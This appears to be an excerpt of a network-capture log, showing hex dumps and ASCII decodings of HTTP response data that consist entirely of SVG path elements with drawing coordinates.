                                                                                                                                                                                                                                                        Data Ascii: 79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17">
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5508INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 31 2e 30 37 2c 31 33 39 2e 33 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M651.07,139.33a1.91,1.91,0,0,1-.86,2.48,2.8,2.8,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5524INData Raw: 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: 9,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5540INData Raw: 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 36 39 2c 31 32 39 2e 37 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,3.18"></path><path class="cls-7" d="M705.69,129.75a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5556INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.34,2.34,0,0,1,.17,3.17"></path><path class="cls-7" d="M740.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5572INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 33 31 2c 31 32 30 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30
                                                                                                                                                                                                                                                        Data Ascii: lass="cls-7" d="M760.31,120.18a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5588INData Raw: 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: .12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5604INData Raw: 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 39 32 2c 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22
                                                                                                                                                                                                                                                        Data Ascii: 3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M688.92,233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5620INData Raw: 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 33 32 39 2e 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                        Data Ascii: 2.63,0,0,1,0,3.57"></path><path class="cls-9" d="M723.35,329.6a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5636INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 38 2c 34 32 35 2e 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35
                                                                                                                                                                                                                                                        Data Ascii: ="cls-9" d="M757.78,425.4a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5652INData Raw: 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5668INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5684INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 34 37 2e 38 32 2c 32 31 37 2e 38 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M847.82,217.86a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5700INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 32 35 2c 33 31 33 2e 36 35 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: class="cls-9" d="M882.25,313.65a2.15,2.15,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5716INData Raw: 39 22 20 64 3d 22 4d 39 31 36 2e 36 37 2c 34 30 39 2e 34 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 9" d="M916.67,409.45a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5732INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e
                                                                                                                                                                                                                                                        Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path>
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5748INData Raw: 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37
                                                                                                                                                                                                                                                        Data Ascii: a3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67.05,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M49.77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5764INData Raw: 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
